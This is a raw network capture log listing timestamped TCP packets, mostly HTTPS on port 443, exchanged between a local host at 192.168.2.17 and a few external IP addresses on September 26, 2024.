Sep 26, 2024 17:41:26.544991970 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.551357031 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.557977915 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.558012962 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.558058977 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.558067083 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.558125019 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.564662933 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.570940018 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.570981979 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.571031094 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.571038961 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.571130037 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.576602936 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.582695961 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.582740068 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.582793951 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.582804918 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.582850933 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.588591099 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.594448090 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.594504118 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.594511032 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.597615957 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.597706079 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.597943068 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.597995043 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.598010063 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.598016024 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.598038912 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.598057032 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.598140955 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.598200083 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.600466013 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.600599051 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.600605965 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.615526915 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.615570068 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.615637064 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.615652084 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.615794897 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.617516041 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.623496056 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.623557091 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.623599052 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.623609066 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.623651981 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.629019022 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.634661913 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.634716988 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.634742022 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.634881020 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.634881020 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.634912014 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.639739990 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.639820099 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.639832973 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.639869928 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.639887094 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.639911890 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.640005112 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.640089989 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.640181065 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.640244961 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.640367985 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.640436888 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.640480995 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.640537024 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.640682936 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.640731096 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.640738010 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.640753984 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.640814066 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.641757965 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.641846895 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.642014027 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.642091990 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.646039009 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.646114111 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.646130085 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.651087999 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.651140928 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.651168108 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.656482935 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.656569958 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.656601906 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.659727097 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.659787893 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.659811020 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.664835930 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.664891005 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.664915085 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.669738054 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.669800997 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.669833899 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.674818039 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.674891949 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.674909115 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.679439068 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.679519892 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.679548979 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.683780909 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.683856010 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.683871984 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.688200951 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.688262939 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.688276052 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.692308903 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.692367077 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.692379951 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.696635962 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.696692944 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.696701050 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.700884104 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.700949907 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.700977087 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.704164028 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.704220057 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.704229116 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.711297989 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.711360931 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.711369038 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.712774992 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.712829113 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.712835073 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.712970018 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.713021994 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.713053942 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.713063955 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.713114023 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.714946032 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.715002060 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.715008974 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.716793060 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.716847897 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.716854095 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.719671011 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.719731092 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.719744921 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.722110987 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.722162008 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.722176075 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.725928068 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.725987911 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.725996971 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.726084948 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.726130962 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.726284981 CEST	49727	443	192.168.2.17	142.250.184.238
Sep 26, 2024 17:41:26.726305008 CEST	443	49727	142.250.184.238	192.168.2.17
Sep 26, 2024 17:41:26.753103018 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.753190994 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.754271030 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.754336119 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.755776882 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.755872011 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.755892038 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.755950928 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.828428030 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.828486919 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.828525066 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.828545094 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.828562021 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.828581095 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.868447065 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.868567944 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.869168997 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.869232893 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.870909929 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.870982885 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.870985985 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.870997906 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.871045113 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.944298029 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.944489956 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.949948072 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.950038910 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:26.984673023 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:26.984803915 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102138042 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102191925 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102222919 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102237940 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102276087 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102385044 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102428913 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102436066 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102442026 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102475882 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102626085 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102699995 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102751970 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.102808952 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.102981091 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.103024960 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.103030920 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.103038073 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.103177071 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.141140938 CEST	49682	80	192.168.2.17	192.229.211.108
Sep 26, 2024 17:41:27.168735027 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.169035912 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.169060946 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.169421911 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.169490099 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.170115948 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.170172930 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.171154976 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.171216965 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.171329021 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.171344042 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.171360970 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.175235987 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.175436974 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.210201979 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.210304022 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.211405039 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.216360092 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.216459036 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.218631983 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.218703032 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.218750954 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.218796015 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.221128941 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.326196909 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.326334000 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.331583023 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.331670046 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.385715008 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.386518955 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.386590958 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.387146950 CEST	49729	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:27.387166977 CEST	443	49729	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:27.450301886 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.450444937 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.637995005 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.638060093 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.638159990 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.638200045 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.638232946 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.638262987 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.678699970 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.678757906 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.678854942 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.678885937 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.678898096 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.678926945 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.678932905 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.678946018 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.678991079 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.681530952 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.681654930 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.681684971 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.681771994 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.681879044 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.681936979 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.791462898 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.791614056 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.796631098 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.796730042 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.799372911 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.799448967 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.908893108 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.909091949 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:27.911246061 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:27.911336899 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.020344019 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.020510912 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.027208090 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.027390003 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.134696960 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.134865046 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.139313936 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.139472961 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.186646938 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.186784029 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.249182940 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.249321938 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.256139994 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.256302118 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.364368916 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.364557981 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.369415998 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.369529963 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.399676085 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:28.399743080 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:28.399831057 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:28.400110006 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:28.400127888 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:28.417664051 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.417798996 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.483223915 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.483355045 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.634318113 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.634444952 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.634445906 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.634474993 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.634505033 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.634515047 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.634603024 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.634665012 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.752080917 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.752140045 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.752249002 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.752279997 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.752310991 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.752337933 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.829052925 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.829194069 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.868052006 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.868211031 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:28.941988945 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:28.942157030 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.048125982 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.048510075 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:29.048542976 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.048928022 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.049253941 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:29.049324989 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.049438953 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:29.049463034 CEST	49730	443	192.168.2.17	142.250.186.110
Sep 26, 2024 17:41:29.049470901 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.173319101 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.173372030 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.173479080 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.173515081 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.173531055 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.173552036 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.173588991 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.173646927 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.218482018 CEST	443	49722	185.255.122.133	192.168.2.17
Sep 26, 2024 17:41:29.218607903 CEST	49722	443	192.168.2.17	185.255.122.133
Sep 26, 2024 17:41:29.291554928 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.293064117 CEST	443	49730	142.250.186.110	192.168.2.17
Sep 26, 2024 17:41:29.293133020 CEST	49730	443	192.168.2.17	142.250.186.110
